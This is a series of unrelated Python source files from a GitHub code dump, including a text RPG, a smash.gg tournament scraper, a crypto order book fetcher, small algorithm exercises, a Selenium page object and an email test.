0})\n {'Class': 'Sorcerer', 'Current_HP': 48, 'Max_HP': 48, 'Attack': 40, 'Defence': 11}\n \"\"\"\n if character['Class'] == 'Samurai':\n character['Current_HP'] += 56\n character['Max_HP'] += 56\n character['Attack'] += 35\n character['Defence'] += 12\n elif character['Class'] == 'Berserker':\n character['Current_HP'] += 67\n character['Max_HP'] += 67\n character['Attack'] += 27\n character['Defence'] += 21\n elif character['Class'] == 'Sorcerer':\n character['Current_HP'] += 48\n character['Max_HP'] += 48\n character['Attack'] += 40\n character['Defence'] += 11\n elif character['Class'] == 'Elementalist':\n character['Current_HP'] += 73\n character['Max_HP'] += 73\n character['Attack'] += 25\n character['Defence'] += 18\n elif character['Class'] == 'Paladin':\n character['Current_HP'] += 165\n character['Max_HP'] += 165\n character['Attack'] += 20\n character['Defence'] += 28\n return character\n\n\ndef game():\n \"\"\"\n game loop\n\n :return: None\n \"\"\"\n print(f\"In the vast world of Entia, there was always peace and unity.\"\n f\"\\nEveryone worked together to create 'Entia Capital City', a place where everyone could live in peace\"\n f\"\\nHowever, all was not as peaceful as it seemed. Those who lived in the forest did not receive equal treatment\"\n f\"\\nThis was because they were different from the others.\"\n f\"\\nThey were often called 'Demons' because of their looks.\"\n f\"\\nDespite the inequality, they did not do anything about it\"\n f\"\\nThat was until one day, a boy named 'Drakon' was born.\"\n f\"\\nGrowing up, Drakon despised the inequality. 
He hated it so much...\"\n f\"\\nHe chose to become an educator amongst the 'demons'.\"\n f\"\\nThat was until one day his father was wrongfully killed by the Entian Royal Guards.\"\n f\"\\nHis eyes filled with rage and he killed the guards, barely surviving in the process\"\n f\"\\nWith the blood on the floor, one of the guards, with his dying breath, drew a scripture on the floor\"\n f\"\\nIt summoned a demon, but unbeknownst to the guard, the demon would not be killing Drakon.\")\n time.sleep(15)\n print(f\"\\nIt\")\n time.sleep(1)\n print(f\"\\nWould\")\n time.sleep(1)\n print(f\"\\nKill\")\n time.sleep(1)\n print(f\"\\nHim.\")\n time.sleep(1)\n print(f\"\\nThe demon locked eye contact with Drakon and negotiated a deal\"\n f\"\\nDemon: If you sign a contract with me, I will lend you my powers\"\n f\"\\nDrakon: What's the catch\"\n f\"\\nDemon: You kill every single person in Entia\"\n f\"\\nWithout hesitating, Drakon agreed to the contract\"\n f\"\\nHe felt a rush of evil energy coursing through his veins\"\n f\"\\nHe walked slowly towards the capital city\"\n f\"\\nHe killed everyone on sight\"\n f\"\\nNot even the heroes of the city could stop him\"\n f\"\\nOne hero decided to run away, running to the most isolated area of Entia\"\n f\"\\nHe ran to Stowry Village\"\n f\"\\nThat's when he met you, the strongest warrior of Stowry.\"\n f\"\\nHe saw promise, and even trained you.\"\n f\"\\nHe explained the situation on his deathbed, 12 months after training\"\n f\"\\nHis dying wish was\")\n time.sleep(10)\n print(f'\\nStop')\n time.sleep(1)\n print(f\"Drakon\\n\\n\\n\\n\\n\\n\")\n rows = 5\n columns = 5\n board = make_board(rows, columns)\n character = make_character()\n player_stats(character)\n player_move_set(character)\n achieved_goal = False\n describe_current_location(board, character)\n while not achieved_goal:\n direction = get_user_choice()\n valid_move = validate_move(character, direction)\n if valid_move:\n move_character(character, direction)\n describe_current_location(board, character)\n there_is_a_challenge = check_for_challenges(character)\n if there_is_a_challenge:\n execute_challenge_protocol(character)\n if character_has_leveled(character):\n execute_glow_up_protocol(character)\n player_move_set(character)\n achieved_goal = check_if_goal_attained(character)\n else:\n print('Invalid direction! Try again... ')\n print(f'GAME OVER: GOOD ENDING! 
\\nYou beat Drakon and brought peace to Entia')\n\n\ndef main():\n game()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mnkhee/assignment-4-mnkhee","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":45645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21629166732","text":"import itertools\nimport json\nimport logging\nimport time\nfrom datetime import datetime\nfrom urllib.error import HTTPError\n\nimport typing\nfrom graphqlclient import GraphQLClient\n\nfrom ranking_scraper.gql_query import GraphQLQuery\nfrom ranking_scraper.model import Game, Event, EventState, EventType, EventFormat, Set, Player\nfrom ranking_scraper.smashgg import queries\nfrom ranking_scraper.config import get_config\nfrom ranking_scraper.scraper import Scraper\n\n_l = logging.getLogger(__name__)\n\nSMASHGG_API_ENDPOINT = 'https://api.smash.gg/gql/alpha'\n\n# Maps smash.gg event type (int) to our internal event type (enum; backed by int).\nEVENT_TYPE_ENUM_MAP = {1: EventType.SINGLES.value,\n 5: EventType.DOUBLES.value, }\n\n\nclass SmashGGScraper(Scraper):\n def __init__(self,\n session=None,\n api_token: str = None,\n max_requests_per_min=80,\n object_limit=1000):\n super(SmashGGScraper, self).__init__(session=session)\n self._client = GraphQLClient(endpoint=SMASHGG_API_ENDPOINT)\n self._client.inject_token(f'Bearer {api_token or get_config()[\"smashgg_api_token\"]}')\n self._req_times = [0 for _ in range(max_requests_per_min)]\n self._req_idx = 0 # type: int\n self.object_limit = object_limit\n\n # API interaction\n def submit_request(self,\n query: GraphQLQuery,\n params: dict = None,\n include_metadata=False) -> dict:\n \"\"\"\n Submit a query request to the smash.gg API.\n\n :return: The response data in dictionary format (parsed as json). The response metadata\n is not returned unless \"include_metadata\" is set to True. In such a case, any data is\n under the \"data\" key. (effectively, the response is returned as-is).\n :rtype: dict\n \"\"\"\n params = params or dict()\n _l.debug(f'> Executing query \"{query.query_name}\".')\n result = self._execute_request(query.build(), params) # str\n result = json.loads(result)\n # Ignore metadata and just return the requested data.\n try:\n return result if include_metadata else result[\"data\"]\n except KeyError:\n _l.error(f'Result did not contain \"data\" key. Result is: {result}')\n raise\n\n def _execute_request(self,\n query: str,\n params=None,\n max_retries: int = 5,\n initial_wait_time: int or float = 1.5,\n max_wait_time: int or float = 60.0):\n \"\"\"\n Executes the graphQL request with exponential back-off.\n\n :param query: The graphQL query in string format.\n :type query: str\n\n :param params: Parameters for the request. If not provided, an empty\n dict is given.\n :type params: dict\n\n :param max_retries: Maximum number of times to retry. Default: 5 . 
A value lower than 0 is\n treated as 0.\n :type max_retries: int\n\n :param max_wait_time: Maximum amount of time (in seconds) to wait.\n Default: 60.0.\n :type max_wait_time: int or float\n\n :return: The response string.\n :rtype: str\n \"\"\"\n wait_time = initial_wait_time\n max_retries = max(max_retries, 0) # Ensure no negative value\n for attempt_nr in range(max_retries + 1): # Initial try + max_retries\n try:\n return self._client.execute(query=query,\n variables=params or dict())\n except HTTPError as http_err:\n if http_err.code != 429: # 429 = Too Many Requests\n raise http_err\n if attempt_nr >= max_retries: # Too many retries have failed.\n raise http_err\n # Note: 400 (bad request) can be given to indicate too high\n # complexity for a request.\n wait_time *= 2.0\n _l.warning(f\"Too many requests (429). Waiting {wait_time:.1f}\"\n f\" seconds before resuming.\")\n time.sleep(min(wait_time, max_wait_time))\n continue\n\n # Scraping methods\n def pull_event_data(self,\n game_code: str,\n from_dt: datetime,\n to_dt: datetime = None,\n countries: typing.List[str] = None) -> typing.List[Event]:\n \"\"\"\n Retrieve events for a given game in a given time frame.\n\n Optionally limit the query to a list of countries (defined by country codes).\n\n This will only retrieve tournaments & their events; it will not populate the set data.\n\n :return: List of new events that have been added.\n \"\"\"\n to_dt = to_dt or datetime.utcnow()\n countries = countries or [None] # Note: list of None, not just list\n game = self.session.query(Game).filter(Game.code == game_code).one()\n _l.info('### Retrieving event data ###')\n # 1. Retrieve events for every requested country.\n found_events = list()\n for country_code in countries:\n found_events.extend(self._get_events(game,\n from_dt=from_dt,\n to_dt=to_dt,\n country_code=country_code))\n # 2. Check for any existing Event in database already (discard if existing).\n new_events = self._filter_out_known_events(found_events)\n _l.info(f'Retrieved {len(found_events)} events, containing {len(new_events)} new events. '\n f'({len(found_events) - len(new_events)} events are already known)')\n self.session.add_all(new_events)\n _l.info('### Populated database with new Event instances ###')\n self.session.commit()\n return new_events\n\n def populate_event(self, event: Event) -> typing.List[Set]:\n \"\"\"\n Populates an event's set data.\n\n Updates the event's format and state.\n\n :return: The list of created Sets.\n \"\"\"\n _l.info(f'Populating event {event.name}')\n if event.is_populated:\n _l.warning(f'Not populating event {event.name}. 
It is already populated.')\n return list()\n if event.type == EventType.DOUBLES or event.type == EventType.UNKNOWN:\n error_msg = f'SKIPPING - EventType {event.type.name} is currently not supported.'\n _l.warning(error_msg)\n return list()\n _q = queries.get_event_phases(event.sgg_event_id)\n phases_data = self.submit_request(query=_q)['event']['phases']\n event.format = _find_event_format(phases_data) # Update event format\n set_dicts = self._get_phase_sets_data(phases_data=phases_data)\n sets = self._create_sets_from_set_dicts(event=event, set_dicts=set_dicts)\n self.session.add_all(sets)\n self.session.commit()\n return sets\n\n def populate_events(self, events: typing.List[Event]) -> typing.List[Set]:\n return list(itertools.chain(*(self.populate_event(_e) for _e in events)))\n\n def _get_events(self, game: Game, from_dt: datetime, to_dt: datetime,\n country_code: str = None) -> typing.List[Event]:\n \"\"\"\n Fetches all events for a game from a specific time period.\n\n Optionally limits the retrieval to a specific country.\n\n :return: A dictionary of events found in all tournaments that match the given criteria.\n \"\"\"\n from_dt = int(from_dt.timestamp())\n to_dt = int(to_dt.timestamp())\n _l.info(f'Retrieving tournament data for '\n f'\"{country_code if country_code else \"all countries\"}\".')\n _q = queries.get_completed_tournaments_paging(game_id=game.sgg_id,\n country_code=country_code,\n from_date=from_dt,\n to_date=to_dt)\n page_info = self.submit_request(query=_q)['tournaments']['pageInfo']\n tournament_dicts = list()\n for page_nr in range(1, page_info['totalPages'] + 1):\n _l.info(f'Retrieving page {page_nr} of {page_info[\"totalPages\"]}')\n _q = queries.get_completed_tournaments(game_id=game.sgg_id,\n page_nr=page_nr,\n country_code=country_code,\n from_date=from_dt,\n to_date=to_dt)\n _nodes = self.submit_request(query=_q)['tournaments']['nodes']\n tournament_dicts.extend(_nodes)\n # Sanity check: duplicate tournament retrieval check\n if len({t['id'] for t in tournament_dicts}) != len(tournament_dicts):\n _l.error(\n f'Duplicate tournament data retrieved! This is likely an error with the query. '\n f'Skipping further processing of these events. 
'\n f'(Country code: {country_code}, # of tournaments: {len(tournament_dicts)}')\n return list() # TODO: Perhaps safe to merge and process anyway?\n events_list = (self._create_events_from_tournament_dict(td, game)\n for td in tournament_dicts)\n new_events = [_ for _ in itertools.chain(*events_list)]\n return new_events\n\n def _create_events_from_tournament_dict(self,\n tournament_dict: dict,\n game: Game) -> typing.List[Event]:\n new_events = list()\n for evt_data in tournament_dict['events']:\n event_fullname = f'{tournament_dict[\"name\"]} | {evt_data[\"name\"]}'\n if evt_data['state'] != 'COMPLETED':\n _l.debug(f'SKIPPING - event not completed ({event_fullname})')\n continue\n if evt_data['isOnline'] is True:\n _l.debug(f'SKIPPING - event is online competition ({event_fullname})')\n continue\n if evt_data['videogame']['id'] != game.sgg_id:\n _l.debug(f'SKIPPING - game mismatch ({event_fullname})')\n continue\n if not _validate_event_data(evt_data,\n tournament_data=tournament_dict,\n game=game,\n event_fullname=event_fullname):\n continue\n event_type_code = EVENT_TYPE_ENUM_MAP.get(evt_data['type'], EventType.UNKNOWN.value)\n new_event = Event(sgg_tournament_id=tournament_dict['id'],\n sgg_event_id=evt_data['id'],\n game_id=game.id,\n name=event_fullname,\n country=tournament_dict['countryCode'],\n num_entrants=evt_data['numEntrants'],\n end_date=datetime.fromtimestamp(tournament_dict['endAt']),\n note='Added by SmashGGScraper',\n format_code=EventFormat.UNKNOWN.value,\n type_code=event_type_code,\n state_code=EventState.UNVERIFIED.value,\n )\n new_events.append(new_event)\n return new_events\n\n def _filter_out_known_events(self, events: typing.List[Event]) -> typing.List[Event]:\n new_events = list()\n tournament_ids = [evt.sgg_tournament_id for evt in events]\n known_events = self.session.query(Event) \\\n .filter(Event.sgg_tournament_id.in_(tournament_ids)) \\\n .all()\n known_events_ids = {(e.sgg_tournament_id, e.sgg_event_id,) for e in known_events}\n for evt in events:\n if (evt.sgg_tournament_id, evt.sgg_event_id,) in known_events_ids:\n _l.debug(f'SKIPPING - event already known ({evt.name})')\n continue\n new_events.append(evt)\n return new_events\n\n def _get_phase_sets_data(self, phases_data: typing.List[dict]) -> typing.List[dict]:\n all_sets_data = list()\n for phase_dict in phases_data:\n _q = queries.get_phase_sets_paging(phase_dict['id'])\n page_count = self.submit_request(query=_q)['phase']['sets']['pageInfo']['totalPages']\n for page_nr in range(1, page_count + 1):\n _l.debug(f'Retrieving sets page {page_nr} of {page_count}')\n _q = queries.get_phase_sets(phase_dict['id'], page_nr=page_nr)\n phase_sets_data = self.submit_request(query=_q)['phase']['sets']['nodes']\n # CALL_ORDER returns in reverse order when an event is completed\n # see: https://developer.smash.gg/reference/setsorttype.doc.html\n all_sets_data.extend(phase_sets_data)\n total_set_count = len(all_sets_data)\n # Filter out DQ sets\n all_sets_data = [sd for sd in all_sets_data if not _set_data_contains_dq(sd)]\n _l.debug(f'Filtered out {total_set_count - len(all_sets_data)} sets with DQs.')\n # sortType doesn't seem to be reliable. Sorting ourselves to be sure.\n all_sets_data = sorted(all_sets_data, key=lambda sd: sd['startedAt'] or 0)\n return all_sets_data\n\n def _create_sets_from_set_dicts(self,\n event: Event,\n set_dicts: typing.List[dict]) -> typing.List[Set]:\n \"\"\"\n Creates Set and Player instances from given data for a specific Event.\n\n Players are tied to existing players if possible. 
If no Player instance is found, a new\n Player instance is created. This also extends to anonymous entries.\n\n If a player is unverified, it is marked as such on the set.\n \"\"\"\n known_set_ids = [data[0] for data in self.session.query(Set.sgg_id).all()]\n new_set_dicts = [set_data for set_data in set_dicts if set_data['id'] not in known_set_ids]\n _l.info(f'Processing {len(new_set_dicts)} sets. ({len(set_dicts) - len(new_set_dicts)} '\n f'sets are being skipped (IDs are already present in the system).')\n new_sets = list()\n # Track anonymous players from this tournament\n anonymous_players = dict() # type: typing.Dict[str, Player]\n for idx, set_data in enumerate(new_set_dicts):\n winning_slot, losing_slot = sorted(set_data['slots'],\n key=lambda d: d['standing']['placement'])\n # TODO: If we support teams, participants will have to be handled differently.\n winner = self._get_player_for_participant(winning_slot['entrant']['participants'][0],\n anonymous_players_map=anonymous_players)\n loser = self._get_player_for_participant(losing_slot['entrant']['participants'][0],\n anonymous_players_map=anonymous_players)\n new_set = Set(\n sgg_id=set_data['id'],\n order=idx, # Sets are ordered by call order (startedAt); see above\n event=event,\n winning_player=winner,\n winning_score=winning_slot['standing']['stats']['score']['value'],\n winning_player_is_verified=winning_slot['entrant']['participants'][0]['verified'],\n losing_player=loser,\n losing_score=losing_slot['standing']['stats']['score']['value'],\n losing_player_is_verified=losing_slot['entrant']['participants'][0]['verified'])\n new_sets.append(new_set)\n return new_sets\n\n def _get_player_for_participant(self,\n participant_data,\n anonymous_players_map: typing.Dict[str, Player]) -> Player:\n # TODO: Will this cause a new query each time? 
Might have to disable flush for this.\n known_players = self.session.query(Player).filter(Player.sgg_id != None).all()\n known_players = {p.sgg_id: p for p in known_players if p.sgg_id}\n user = participant_data['user']\n if user and user['id']:\n if user['id'] in known_players:\n return known_players[user['id']] # Return stored player\n # Create new tracked Player\n country = user['location']['country'] if user['location'] else None\n new_player = Player(sgg_id=user['id'],\n name=participant_data['gamerTag'],\n country=country) # country can be None (is ok)\n self.session.add(new_player)\n return new_player\n # else: this is an anonymous entry\n tag = participant_data['gamerTag']\n if tag not in anonymous_players_map:\n anon_player = Player(sgg_id=None, name=tag)\n self.session.add(anon_player)\n anonymous_players_map[tag] = anon_player\n return anonymous_players_map[tag]\n\n\ndef _validate_event_data(event_data, tournament_data, game, event_fullname=None):\n event_fullname = event_fullname or f'{tournament_data[\"name\"]} / {event_data[\"name\"]}'\n if event_data['state'] != 'COMPLETED':\n _l.debug(f'SKIPPING - event not completed ({event_fullname})')\n return False\n if event_data['isOnline'] is True:\n _l.debug(f'SKIPPING - event is online competition ({event_fullname})')\n return False\n if event_data['videogame']['id'] != game.sgg_id:\n _l.debug(f'SKIPPING - game mismatch ({event_fullname})')\n return False\n # Skip event with no or little participants\n if not event_data['numEntrants'] or event_data['numEntrants'] < 10:\n _l.debug(f'SKIPPING - no or not enough entrants ({event_fullname})')\n return False\n return True\n\n\nELIMINATION_FORMATS = {'SINGLE_ELIMINATION', 'DOUBLE_ELIMINATION', 'ROUND_ROBIN', 'SWISS'}\nLADDER_FORMATS = {'MATCHMAKING'}\nUNKNOWN_FORMATS = {'EXHIBITION', 'RACE', 'CUSTOM_SCHEDULE', 'ELIMINATION_ROUND'} # Not tracked\n\n\ndef _find_event_format(event_phases: typing.List[dict]) -> EventFormat:\n bracket_types = set(ph['bracketType'] for ph in event_phases)\n if all(_ in ELIMINATION_FORMATS for _ in bracket_types):\n return EventFormat.ELIMINATION\n if all(_ in LADDER_FORMATS for _ in bracket_types):\n return EventFormat.LADDER\n if all(_ in UNKNOWN_FORMATS for _ in bracket_types):\n return EventFormat.UNKNOWN\n return EventFormat.UNKNOWN # Not sure if technically possible to have a mix?\n\n\ndef _set_data_contains_dq(set_data: dict) -> bool:\n \"\"\" Returns True if set_data contains at least one DQ'd player. 
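 A DQ shows up as an entrant score of -1, and a set that was never played has a score of None; both cases are treated as a DQ here.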
\"\"\"\n for entrant in set_data['slots']:\n if entrant['standing']['stats']['score']['value'] is None:\n return True\n if entrant['standing']['stats']['score']['value'] < 0: # DQ = -1\n return True\n return False\n","repo_name":"odysseycaravels/ranking-scraper","sub_path":"ranking_scraper/smashgg/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":19132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8803833235","text":"#!/usr/bin/python\n\nimport urllib.request\nimport json\n\n\ndef update(pair):\n global asks, bids, lastbid, lastask\n if pair == 0:\n url = \"https://poloniex.com/public?command=returnOrderBook&currencyPair=USDT_BTC&depth=10\"\n elif pair == 1:\n url = \"https://poloniex.com/public?command=returnOrderBook&currencyPair=USDT_LTC&depth=10\"\n elif pair == 2:\n url = \"https://poloniex.com/public?command=returnOrderBook&currencyPair=USDT_ETH&depth=10\"\n elif pair == 3:\n url = \"https://poloniex.com/public?command=returnOrderBook&currencyPair=USDT_BCH&depth=10\"\n request = urllib.request.urlopen(url).read().decode(\"utf-8\")\n data = json.loads(request)\n asks = data[\"asks\"]\n bids = data[\"bids\"]\n lastask = (float(asks[0][0]), asks[0][1])\n lastbid = (float(bids[0][0]), bids[0][1])\n","repo_name":"wesleywilian/pytrade","sub_path":"exchanges/poloniex.py","file_name":"poloniex.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"70839824462","text":"import numpy as np\nimport pandas as pd\n\n\ndef knn(train_set: np.ndarray, test_point: np.ndarray, k: int) -> int:\n closest = np.zeros([k, 2])\n for i, train_point in enumerate(train_set):\n dist_vector = test_point - train_point[:-1]\n\n norm = np.linalg.norm(dist_vector)\n\n if i < k:\n closest[i] = [norm, train_point[-1]]\n else:\n largest_index = closest[:, 0].argmax()\n if norm < closest[largest_index, 0]:\n closest[largest_index] = [norm, train_point[-1]]\n\n return round(np.average(closest[:, 1]))\n\n\ndef read_file(file: str) -> np.ndarray:\n with open(file, \"r\") as f:\n file_list = f.readlines()\n array = np.zeros([len(file_list), 3])\n for i, line in enumerate(file_list):\n array[i] = list(map(float, line.split()))\n return array\n","repo_name":"bxia68/cs-760","sub_path":"hw3/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11367965448","text":"n = int(input())\narr = []\nfor _ in range(n):\n data = input().split()\n arr.append((str(data[0]), int(data[1]), int(data[2]), int(data[3])))\n\narr.sort(key=lambda x: (-x[1], x[2], -x[3], x[0]))\n\nfor i in arr:\n print(i[0])","repo_name":"qwas15788hj/Baekjoon","sub_path":"백준/Silver/10825. 
국영수/국영수.py","file_name":"국영수.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35801926695","text":"from doctest import run_docstring_examples\n\ndef pascal(row, column):\n \"\"\"Returns the value of the item in Pascal's Triangle\n whose position is specified by row and column.\n >>> pascal(0, 0) # The top left (the point of the triangle)\n 1\n >>> pascal(0, 5)\t# Empty entry; outside of Pascal's Triangle\n 0\n >>> pascal(3, 2)\t# Row 3 (1 3 3 1), Column 2\n 3\n >>> pascal(4, 2) # Row 4 (1 4 6 4 1), Column 2\n 6\n \"\"\"\n if column < 0 or column > row:\n # positions outside of the triangle are empty\n return 0\n if column == 0 or column == row:\n # the edges of the triangle are all 1\n return 1\n # every interior entry is the sum of the two entries above it\n return pascal(row-1, column-1) + pascal(row-1, column)\n# run_docstring_examples(pascal, globals(), True)\nprint(pascal(2,3))","repo_name":"breadgineer/berkeleyChallenge","sub_path":"cs61a/labs/lab3/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8773543687","text":"import threading\r\nimport time\r\n\r\n# Create a Barrier object sized to the number of threads that will run\r\nbarrier = threading.Barrier(3)\r\n\r\n\r\nclass jalur:\r\n def __init__(self, nama, jenis):\r\n self.nama = nama\r\n self.jenis = jenis\r\n\r\n def jalur_tentu(self):\r\n print(\r\n f\"{self.nama} mulai melakukan pendaftaran pada {time.ctime(time.time())}\")\r\n time.sleep(2)\r\n print(\r\n f\"{self.nama} berhasil melakukan pendaftaran pada {time.ctime(time.time())}\")\r\n # The thread waits at the barrier\r\n barrier.wait()\r\n print(f\"{self.nama} diterima pada jalur {self.jenis}\\n\")\r\n\r\n\r\n# Registration route data\r\njalur1 = jalur(\"Mahasiswa 1\", \"Undangan\")\r\njalur2 = jalur(\"Mahasiswa 2\", \"Reguler\")\r\njalur3 = jalur(\"Mahasiswa 3\", \"Beasiswa\")\r\n\r\nif __name__ == '__main__':\r\n start_time = time.time()\r\n # create a new thread for each route\r\n t1 = threading.Thread(target=jalur1.jalur_tentu)\r\n t1.start()\r\n\r\n t2 = threading.Thread(target=jalur2.jalur_tentu)\r\n t2.start()\r\n\r\n t3 = threading.Thread(target=jalur3.jalur_tentu)\r\n t3.start()\r\n\r\n t1.join()\r\n t2.join()\r\n t3.join()\r\n # print a message once all registration routes are closed\r\n print(\"Semua jalur pendaftaran ditutup pada jam: \", time.ctime(time.time()))\r\n\r\n end_time = time.time()\r\n print(\"Perbandingan pendaftar dan penerima = \", end_time - start_time)\r\n","repo_name":"kerjabhakti/SISTER_3A","sub_path":"QuisSister/1204011_WildanAzril_QUIS/quis1204011.py","file_name":"quis1204011.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73869260941","text":"import numpy as np\n\ndef swap_rows(v,i,j):\n if len(v.shape) == 1:\n # for a column vector\n v[i],v[j] = v[j],v[i]\n else:\n v[[i,j],:] = v[[j,i],:]\n\ndef swap_cols(v,i,j):\n v[:,[i,j]] = v[:,[j,i]]\n\n\ndef gauss_elim_pivot( A_, B_, TOL=1.0e-12 ):\n \n N, Nrhs = B_.shape\n\n assert Nrhs == 1\n\n # Work on copies so the original matrices are not modified\n A = np.matrix.copy(A_)\n b = np.matrix.copy(B_[:,0])\n\n # Scale factors: the largest absolute value in each row\n s = np.zeros(N)\n for i in range(N):\n s[i] = np.max(np.abs(A[i,:]))\n \n # convert s into a column vector\n s = 
np.matrix(s).transpose()\n \n for k in range(0,N-1):\n \n # Ganti baris jika diperlukan\n rr = np.abs(A[k:N,k])/s[k:N]\n p = np.argmax(rr) + k\n \n if abs(A[p,k]) < TOL:\n raise RuntimeError(\"Matriks singular\")\n \n if p != k:\n swap_rows(b,k,p)\n swap_rows(s,k,p)\n swap_rows(A,k,p)\n\n # Eliminasi\n for i in range(k+1,N):\n if A[i,k] != 0.0:\n lam = A[i,k]/A[k,k]\n A[i,k+1:N] = A[i,k+1:N] - lam*A[k,k+1:N]\n b[i] = b[i] - lam*b[k]\n\n if abs(A[N-1,N-1]) < TOL:\n raise RuntimeError(\"Matriks singular\")\n \n # Substitusi balik\n b[N-1] = b[N-1]/A[N-1,N-1]\n for k in range(N-2,-1,-1):\n b[k] = (b[k] - np.dot(A[k,k+1:N],b[k+1:N]))/A[k,k]\n \n return b\n\n","repo_name":"f-fathurrahman/ffr-MetodeNumerik","sub_path":"SistemPersLinear/python3/gauss_elim_pivot.py","file_name":"gauss_elim_pivot.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"74025419023","text":"import pytest\n\n\nfrom service.utilities.email import send_email\nfrom pydantic_models.wishlist_game import WishlistGameFull\nfrom config.settings import settings\n\nBARGAIN1 = WishlistGameFull(\n uuid=\"test-uuid\",\n wishlist_uuid=\"test-wishlist-uuid\",\n game_id=\"EP1302-CUSA14370_00-GHOSTOFATALE0000\",\n price_old=25.90,\n price_new=12.95,\n currency=\"CHF\",\n on_sale=True,\n name=\"Ghost of a Tale\",\n shop=\"PlayStation\",\n img_link=\"https://image.api.playstation.com/cdn/EP1302/CUSA14370_00/pz34zcrT5PB1E36hAseLAIu65fF9W4Cd.png\",\n link=\"https://store.playstation.com/de-ch/product/EP1302-CUSA14370_00-GHOSTOFATALE0000\"\n )\n\nBARGAIN2 = WishlistGameFull(\n uuid=\"test-uuid\",\n wishlist_uuid=\"test-wishlist-uuid\",\n game_id=\"EP2333-PPSA01826_00-PATHLESSSIEE0000\",\n price_old=39.90,\n price_new=19.95,\n currency=\"CHF\",\n on_sale=True,\n name=\"The Pathless\",\n shop=\"PlayStation\",\n img_link=\"https://image.api.playstation.com/vulcan/ap/rnd/202007/1500/PzzL4lymRdZuLEerjeL58HG8.png\",\n link=\"https://store.playstation.com/de-ch/product/EP2333-PPSA01826_00-PATHLESSSIEE0000\"\n)\n\nBARGAIN3 = WishlistGameFull(\n uuid=\"test-uuid\",\n wishlist_uuid=\"test-wishlist-uuid\",\n game_id=\"70010000012835\",\n price_old=19.99,\n price_new=9.99,\n currency=\"CHF\",\n on_sale=True,\n name=\"Abzû\",\n shop=\"Nintendo\",\n img_link=\"https://fs-prod-cdn.nintendo-europe.com/media/images/10_share_images/games_15/nintendo_switch_download_software_1/H2x1_NSwitchDS_Abzu_image1600w.jpg\",\n link=\"https://www.nintendo.ch/de/Games/Nintendo-Switch-download-software/ABZU-1467719.html\"\n)\n\n@pytest.mark.manual\n@pytest.mark.skipif(not settings.TEST_RECEIVER_EMAIL, reason=\"No test receiver email set\")\n@pytest.mark.skip(reason=\"Manual test\")\ndef test_send_email():\n bargains = [BARGAIN1,BARGAIN2,BARGAIN3]\n send_email(settings.TEST_RECEIVER_EMAIL,bargains)\n assert True","repo_name":"olilu/the-bargain-hand-be","sub_path":"tests/service_tests/test_email_utilitiy.py","file_name":"test_email_utilitiy.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13246774281","text":"from selenium.webdriver.common.by import By\nfrom main.pages.BasePage import BasePage\nfrom main.pages.SidePanel import SidePanel\n\nDELETE_USER_BUTTON = (By.CSS_SELECTOR, \".btn.btn-link.text-danger\")\nAVAILABLE_ROLE = (By.XPATH, \"//button[@id='dropdownMenuButton']\")\nDELETE_BUTTON = (By.CSS_SELECTOR, \".btn.btn-danger\")\nROLE_DROPDOWN_MENU = (By.XPATH, 
\"//div[@class='dropdown-menu show']\")\nERROR_TITLE = (By.XPATH, \"//span[@class='jnoty-title']\")\nERROR_MESSAGE = (By.XPATH, \"//div[@class='jnoty-message']\")\n\n\nclass UserRolesProfilePage(SidePanel):\n def __init__(self, driver):\n super().__init__(driver)\n\n def update_user_role(self, name):\n print(\"Select User Role '%s'\" % name)\n self.wait_element_present(AVAILABLE_ROLE).click()\n select = self.wait_element_present(ROLE_DROPDOWN_MENU)\n for option in select.find_elements_by_tag_name('span'):\n if option.text in name:\n option.click()\n break\n self.sleep(10)\n return UserRolesProfilePage(self.driver)\n\n def verify_updated_user_role(self, name):\n print(\"Make sure that current role is '%s'\" % name)\n text = self.wait_element_visible(AVAILABLE_ROLE).text\n print(text)\n is_exists = False\n if name in text:\n is_exists = True\n assert is_exists is True, \"Wrong role is present\"\n return UserRolesProfilePage(self.driver)\n\n def verify_error_message(self, title, message):\n print(\"Make sure that Error title '%s' and message '%s' are present\" % (title, message))\n error_title = self.wait_element_visible(ERROR_TITLE).text\n error_message = self.wait_element_visible(ERROR_MESSAGE).text\n is_exists = False\n if title in error_title and message in error_message:\n is_exists = True\n assert is_exists is True, \"Error message box absent\"\n return UserRolesProfilePage(self.driver)\n\n def delete_user(self):\n print(\"Click on 'Delete user' button to delete user\")\n self.wait_element_present(DELETE_USER_BUTTON).click()\n self.sleep(3)\n self.wait_element_present(DELETE_BUTTON).click()\n self.sleep(5)\n from main.pages.UserRolesPage import UserRolesPage\n return UserRolesPage(self.driver)\n\n","repo_name":"mayadata-io/gui-automation","sub_path":"main/pages/UserRolesProfilePage.py","file_name":"UserRolesProfilePage.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"4668843243","text":"# Author: Werley Cordeiro\r\n# werleycordeiro@gmail.com\r\nimport numpy as np\r\nimport pandas as pd\r\nimport lyapunov\r\nimport Nelson_Siegel_factor_loadings\r\nimport Kfilter\r\nfrom lyapunov import lyapunov\r\nfrom Nelson_Siegel_factor_loadings import 